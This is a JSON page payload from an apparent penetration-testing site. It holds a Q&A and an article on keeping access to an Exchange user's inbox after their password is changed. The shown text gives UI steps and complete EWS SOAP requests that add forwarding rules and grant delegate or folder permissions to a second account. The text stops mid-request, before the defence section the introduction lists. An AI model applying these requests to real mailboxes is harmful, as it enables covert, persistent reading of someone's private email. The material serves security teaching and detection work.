[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fvpcIhYywoXFvaor0dxBCWl7v711saNiONCOdicGdVtY":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},437,"What is a less detectable method to continuously read a target user's Exchange emails without modifying their mailbox rules?","Instead of forwarding rules, an attacker can add themselves (user test2) as a delegate with folder permissions on test1's inbox. This can be done via Outlook Web App (OWA) by setting \"Editor\" permissions, or programmatically using **AddDelegate** or **UpdateFolder** SOAP requests. User test2 can then access test1's inbox as a shared folder. However, note that if test1 deletes an email, test2 loses access to that message. This approach is covered in the article alongside the [Penetration Basics - Implementation of Exchange One-Liner Backdoor](\u002Fnews\u002Fpenetration-basics-implementation-of-exchange-one-liner-backdoor).","\u003Cp>Instead of forwarding rules, an attacker can add themselves (user test2) as a delegate with folder permissions on test1&#39;s inbox. This can be done via Outlook Web App (OWA) by setting &quot;Editor&quot; permissions, or programmatically using **AddDelegate** or **UpdateFolder** SOAP requests. User test2 can then access test1&#39;s inbox as a shared folder. However, note that if test1 deletes an email, test2 loses access to that message. This approach is covered in the article alongside the [Penetration Basics - Implementation of Exchange One-Liner Backdoor](\u002Fnews\u002Fpenetration-basics-implementation-of-exchange-one-liner-backdoor).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-basics-methods-to-continuously-obtain-exchange-user-inbox-emails\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-a-less-detectable-method-to-continuously-read-a-target-users-exchange-em-1777483595835","OWA, AddDelegate, UpdateFolder, permissions, persistent access, shared folder",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},110,"Penetration Basics - Methods to Continuously Obtain Exchange User Inbox Emails","penetration-basics-methods-to-continuously-obtain-exchange-user-inbox-emails","Learn methods to persistently access Exchange user inbox emails via forwarding rules and permissions. Includes defense tips for securing email data after password leaks.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>When we obtain a user's password or hash, we can read that user's emails.\u003C\u002Fp>\u003Cp>If the user changes their password, can we continue to read that user's emails without knowing the new password?\u003C\u002Fp>\u003Cp>From a defensive perspective, when a mail user's password is leaked, what additional steps should we take after changing the password to ensure the security of email data?\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Method to continuously obtain Exchange user inbox emails by adding forwarding rules\u003C\u002Fli>\u003Cli>Method to continuously obtain Exchange user inbox emails by adding access permissions\u003C\u002Fli>\u003Cli>Method to continuously obtain Exchange user inbox emails by adding mail functions\u003C\u002Fli>\u003Cli>Method to continuously obtain Exchange user emails by adding user permissions\u003C\u002Fli>\u003Cli>Open-source code\u003C\u002Fli>\u003Cli>Defense and detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Method to Continuously Obtain Exchange User Inbox Emails by Adding Forwarding Rules\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Adding forwarding rules via ECP\u003C\u002Fh3>\u003Cp>Requires access to Exchange Control Panel (ECP)\u003C\u002Fp>\u003Cp>Log in as user test1, select organize email -&gt; inbox rules, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017267123_0_d8247b6d3a.jpeg\">\u003C\u002Fp>\u003Cp>Select Create a new rule for arriving messages...\u003C\u002Fp>\u003Cp>Set Name as the rule name, here set to Forwardtest\u003C\u002Fp>\u003Cp>Configure sequentially as [Apply to all messages], Forward the message to..., select target user test2, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017290564_1_abd8302824.jpeg\">\u003C\u002Fp>\u003Cp>At this point, the rule is successfully added\u003C\u002Fp>\u003Cp>Whenever user test1 receives an email, the email will also be sent to user test2's inbox\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If test1 deletes the email from the inbox, test2 is not affected\u003C\u002Fp>\u003Ch3>2. Implementation via SOAP XML message\u003C\u002Fh3>\u003Cp>SOAP format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fweb-service-reference\u002Fupdateinboxrules-operation\u003C\u002Fp>\u003Cp>Create and delete rules using UpdateInboxRules\u003C\u002Fp>\u003Cp>Format for creating a rule to forward emails to user test2:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updateinboxrules>\u003Cbr>      \u003Cm:removeoutlookruleblob>true\u003C\u002Fm:removeoutlookruleblob>\u003Cbr>      \u003Cm:operations>\u003Cbr>        \u003Ct:createruleoperation>\u003Cbr>          \u003Ct:rule>\u003Cbr>            \u003Ct:displayname>ForwardRule\u003C\u002Ft:displayname>\u003Cbr>            \u003Ct:priority>1\u003C\u002Ft:priority>\u003Cbr>            \u003Ct:isenabled>true\u003C\u002Ft:isenabled>\u003Cbr>            \u003Ct:conditions>\u003Cbr>            \u003Ct:exceptions>\u003Cbr>            \u003Ct:actions>\u003Cbr>              \u003Ct:forwardtorecipients>\u003Cbr>                \u003Ct:address>\u003Cbr>                  \u003Ct:emailaddress>test2@test.com\u003C\u002Ft:emailaddress>\u003Cbr>                \u003C\u002Ft:address>\u003Cbr>              \u003C\u002Ft:forwardtorecipients>\u003Cbr>            \u003C\u002Ft:actions>\u003Cbr>          \u003C\u002Ft:exceptions>\u003C\u002Ft:conditions>\u003C\u002Ft:rule>\u003Cbr>        \u003C\u002Ft:createruleoperation>\u003Cbr>      \u003C\u002Fm:operations>\u003Cbr>    \u003C\u002Fm:updateinboxrules>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Reading rules uses GetInboxRules\u003C\u002Fp>\u003Cp>The format for reading rule information for user test1 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:getinboxrules>\u003Cbr>      \u003Cm:mailboxsmtpaddress>test1@test.com\u003C\u002Fm:mailboxsmtpaddress>\u003Cbr>    \u003C\u002Fm:getinboxrules>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The RuleID corresponding to the rule can be obtained from the returned result.\u003C\u002Fp>\u003Cp>The format for deleting a specified rule is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updateinboxrules>\u003Cbr>      \u003Cm:removeoutlookruleblob>true\u003C\u002Fm:removeoutlookruleblob>\u003Cbr>        \u003Cm:operations>\u003Cbr>          \u003Ct:deleteruleoperation>\u003Cbr>            \u003Ct:ruleid>AQAAAAAADPg\u003C\u002Ft:ruleid>\u003Cbr>          \u003C\u002Ft:deleteruleoperation>\u003Cbr>        \u003C\u002Fm:operations>\u003Cbr>    \u003C\u002Fm:updateinboxrules>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>AQAAAAAADPg is the RuleId, which can be obtained via GetInboxRules\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The latter part of this article will introduce the complete implementation code\u003C\u002Fp>\u003Ch2>0x03 Method to Add Access Permissions for Persistent Access to Exchange User Inbox Emails\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Supports inbox, does not support outbox\u003C\u002Fp>\u003Ch3>1. Add inbox access permissions via OWA\u003C\u002Fh3>\u003Cp>Requires access to Outlook Web Access (OWA)\u003C\u002Fp>\u003Cp>Log in as user test1, select Inbox -&gt; permissions..., as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017321998_2_0f92ae2b10.jpeg\">\u003C\u002Fp>\u003Cp>Add user test2 with edit permissions\u003C\u002Fp>\u003Cul>\u003Cli>Read: Full details\u003C\u002Fli>\u003Cli>Write: Edit all\u003C\u002Fli>\u003Cli>Delete access: None\u003C\u002Fli>\u003Cli>Other: Folder visible\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Alternatively, directly set the Permission level to Editor, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017371093_3_88aca0cc5b.jpeg\">\u003C\u002Fp>\u003Cp>At this point, permission setup is complete\u003C\u002Fp>\u003Cp>Log in as user test2, select add shared folder..., enter username test1 to obtain access to user test1's inbox\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If test1 deletes emails from the inbox, test2 cannot read the deleted emails\u003C\u002Fp>\u003Ch3>2. Implement via SOAP XML message\u003C\u002Fh3>\u003Cp>Add access permissions using AddDelegate or UpdateFolder\u003C\u002Fp>\u003Ch4>1. AddDelegate\u003C\u002Fh4>\u003Cp>SOAP format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fweb-service-reference\u002Fadddelegate-operation\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>AddDelegate supports the following folders:\u003C\u002Fp>\u003Cul>\u003Cli>CalendarFolderPermissionLevel\u003C\u002Fli>\u003Cli>TasksFolderPermissionLevel\u003C\u002Fli>\u003Cli>InboxFolderPermissionLevel\u003C\u002Fli>\u003Cli>ContactsFolderPermissionLevel\u003C\u002Fli>\u003Cli>NotesFolderPermissionLevel\u003C\u002Fli>\u003Cli>JournalFolderPermissionLevel\u003C\u002Fli>\u003C\u002Ful>\u003Cp>To view the access permissions for user test1's inbox, use the following format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:getdelegate includepermissions=\"true\">\u003Cbr>      \u003Cm:mailbox>\u003Cbr>        \u003Ct:emailaddress>test1@test.com\u003C\u002Ft:emailaddress>\u003Cbr>      \u003C\u002Fm:mailbox>\u003Cbr>    \u003C\u002Fm:getdelegate>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Grant user test2 full access permissions to user test1's inbox, in the following format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:adddelegate>\u003Cbr>      \u003Cm:mailbox>\u003Cbr>        \u003Ct:emailaddress>test1@test.com\u003C\u002Ft:emailaddress>\u003Cbr>      \u003C\u002Fm:mailbox>\u003Cbr>      \u003Cm:delegateusers>\u003Cbr>      \u003Ct:delegateuser>\u003Cbr>        \u003Ct:userid>\u003Cbr>          \u003Ct:primarysmtpaddress>test2@test.com\u003C\u002Ft:primarysmtpaddress>\u003Cbr>        \u003C\u002Ft:userid>\u003Cbr>        \u003Ct:delegatepermissions>\u003Cbr>          \u003Ct:inboxfolderpermissionlevel>Editor\u003C\u002Ft:inboxfolderpermissionlevel>\u003Cbr>        \u003C\u002Ft:delegatepermissions>\u003Cbr>        \u003Ct:receivecopiesofmeetingmessages>false\u003C\u002Ft:receivecopiesofmeetingmessages>\u003Cbr>        \u003Ct:viewprivateitems>false\u003C\u002Ft:viewprivateitems>\u003Cbr>      \u003C\u002Ft:delegateuser>\u003Cbr>    \u003C\u002Fm:delegateusers>\u003Cbr>      \u003Cm:delivermeetingrequests>DelegatesAndMe\u003C\u002Fm:delivermeetingrequests>\u003Cbr>    \u003C\u002Fm:adddelegate>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Modify access permissions using UpdateDelegate\u003C\u002Fp>\u003Cp>SOAP format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fweb-service-reference\u002Fupdatedelegate-operation\u003C\u002Fp>\u003Cp>Set full access permissions for user test2 to user test1's inbox, format as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updatedelegate>\u003Cbr>      \u003Cm:mailbox>\u003Cbr>        \u003Ct:emailaddress>test1@test.com\u003C\u002Ft:emailaddress>\u003Cbr>      \u003C\u002Fm:mailbox>\u003Cbr>      \u003Cm:delegateusers>\u003Cbr>      \u003Ct:delegateuser>\u003Cbr>        \u003Ct:userid>\u003Cbr>          \u003Ct:primarysmtpaddress>test2@test.com\u003C\u002Ft:primarysmtpaddress>\u003Cbr>        \u003C\u002Ft:userid>\u003Cbr>        \u003Ct:delegatepermissions>\u003Cbr>          \u003Ct:inboxfolderpermissionlevel>Editor\u003C\u002Ft:inboxfolderpermissionlevel>\u003Cbr>        \u003C\u002Ft:delegatepermissions>\u003Cbr>        \u003Ct:receivecopiesofmeetingmessages>false\u003C\u002Ft:receivecopiesofmeetingmessages>\u003Cbr>        \u003Ct:viewprivateitems>true\u003C\u002Ft:viewprivateitems>\u003Cbr>      \u003C\u002Ft:delegateuser>\u003Cbr>    \u003C\u002Fm:delegateusers>\u003Cbr>      \u003Cm:delivermeetingrequests>DelegatesAndMe\u003C\u002Fm:delivermeetingrequests>\u003Cbr>    \u003C\u002Fm:updatedelegate>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Remove access permissions using RemoveDelegate\u003C\u002Fp>\u003Cp>SOAP format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fweb-service-reference\u002Fremovedelegate-operation\u003C\u002Fp>\u003Cp>Remove user test2's access permissions to user test1's inbox, format as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:removedelegate>\u003Cbr>      \u003Cm:mailbox>\u003Cbr>        \u003Ct:emailaddress>test1@test.com\u003C\u002Ft:emailaddress>\u003Cbr>      \u003C\u002Fm:mailbox>\u003Cbr>      \u003Cm:userids>\u003Cbr>        \u003Ct:userid>\u003Cbr>          \u003Ct:primarysmtpaddress>test2@test.com\u003C\u002Ft:primarysmtpaddress>\u003Cbr>        \u003C\u002Ft:userid>\u003Cbr>    \u003C\u002Fm:userids>\u003Cbr>    \u003C\u002Fm:removedelegate>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2.UpdateFolder\u003C\u002Fh4>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fexchange-web-services\u002Fhow-to-set-folder-permissions-for-another-user-by-using-ews-in-exchange\u003C\u002Fp>\u003Cp>Check the access permissions for user test1's inbox, formatted as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" \u003Cbr=\"\">               xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" \u003Cbr>               xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" \u003Cbr>               xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\"&gt;\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:getfolder>\u003Cbr>      \u003Cm:foldershape>\u003Cbr>        \u003Ct:baseshape>IdOnly\u003C\u002Ft:baseshape>\u003Cbr>        \u003Ct:additionalproperties>\u003Cbr>          \u003Ct:fielduri fielduri=\"folder:PermissionSet\">\u003Cbr>        \u003C\u002Ft:fielduri>\u003C\u002Ft:additionalproperties>\u003Cbr>      \u003C\u002Fm:foldershape>\u003Cbr>      \u003Cm:folderids>\u003Cbr>        \u003Ct:distinguishedfolderid id=\"inbox\">\u003Cbr>      \u003C\u002Ft:distinguishedfolderid>\u003C\u002Fm:folderids>\u003Cbr>    \u003C\u002Fm:getfolder>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Grant user test2 full access permission to user test1's inbox, formatted as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" \u003Cbr=\"\">               xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" \u003Cbr>               xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" \u003Cbr>               xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\"&gt;\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updatefolder>\u003Cbr>      \u003Cm:folderchanges>\u003Cbr>        \u003Ct:folderchange>\u003Cbr>          \u003Ct:folderid id=\"{id}\" changekey=\"{key}\">\u003Cbr>          \u003Ct:updates>\u003Cbr>            \u003Ct:setfolderfield>\u003Cbr>              \u003Ct:fielduri fielduri=\"folder:PermissionSet\">\u003Cbr>              \u003Ct:folder>\u003Cbr>                \u003Ct:permissionset>\u003Cbr>                  \u003Ct:permissions>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                      \u003Ct:userid>\u003Cbr>                        \u003Ct:distinguisheduser>Default\u003C\u002Ft:distinguisheduser>\u003Cbr>                      \u003C\u002Ft:userid>\u003Cbr>                      \u003Ct:cancreateitems>false\u003C\u002Ft:cancreateitems>\u003Cbr>                      \u003Ct:cancreatesubfolders>false\u003C\u002Ft:cancreatesubfolders>\u003Cbr>                      \u003Ct:isfolderowner>false\u003C\u002Ft:isfolderowner>\u003Cbr>                      \u003Ct:isfoldervisible>false\u003C\u002Ft:isfoldervisible>\u003Cbr>                      \u003Ct:isfoldercontact>false\u003C\u002Ft:isfoldercontact>\u003Cbr>                      \u003Ct:edititems>None\u003C\u002Ft:edititems>\u003Cbr>                      \u003Ct:deleteitems>None\u003C\u002Ft:deleteitems>\u003Cbr>                      \u003Ct:readitems>None\u003C\u002Ft:readitems>\u003Cbr>                      \u003Ct:permissionlevel>None\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                    \u003Ct:userid>\u003Cbr>                      \u003Ct:distinguisheduser>Anonymous\u003C\u002Ft:distinguisheduser>\u003Cbr>                    \u003C\u002Ft:userid>\u003Cbr>                    \u003Ct:cancreateitems>false\u003C\u002Ft:cancreateitems>\u003Cbr>                    \u003Ct:cancreatesubfolders>false\u003C\u002Ft:cancreatesubfolders>\u003Cbr>                    \u003Ct:isfolderowner>false\u003C\u002Ft:isfolderowner>\u003Cbr>                    \u003Ct:isfoldervisible>false\u003C\u002Ft:isfoldervisible>\u003Cbr>                    \u003Ct:isfoldercontact>false\u003C\u002Ft:isfoldercontact>\u003Cbr>                    \u003Ct:edititems>None\u003C\u002Ft:edititems>\u003Cbr>                    \u003Ct:deleteitems>None\u003C\u002Ft:deleteitems>\u003Cbr>                    \u003Ct:readitems>None\u003C\u002Ft:readitems>\u003Cbr>                    \u003Ct:permissionlevel>None\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                      \u003Ct:userid>\u003Cbr>                        \u003Ct:primarysmtpaddress>test2@test.com\u003C\u002Ft:primarysmtpaddress>\u003Cbr>                      \u003C\u002Ft:userid>\u003Cbr>                      \u003Ct:permissionlevel>Editor\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                  \u003C\u002Ft:permissions>\u003Cbr>                \u003C\u002Ft:permissionset>\u003Cbr>              \u003C\u002Ft:folder>\u003Cbr>            \u003C\u002Ft:fielduri>\u003C\u002Ft:setfolderfield>\u003Cbr>          \u003C\u002Ft:updates>\u003Cbr>        \u003C\u002Ft:folderid>\u003C\u002Ft:folderchange>\u003Cbr>      \u003C\u002Fm:folderchanges>\u003Cbr>    \u003C\u002Fm:updatefolder>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>It is important to note that the UpdateFolder operation will overwrite existing settings, so a delete operation is equivalent to restoring the permission configuration information.\u003C\u002Fp>\u003Cp>Remove user test2's access permissions to user test1's inbox, formatted as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" \u003Cbr=\"\">               xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" \u003Cbr>               xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" \u003Cbr>               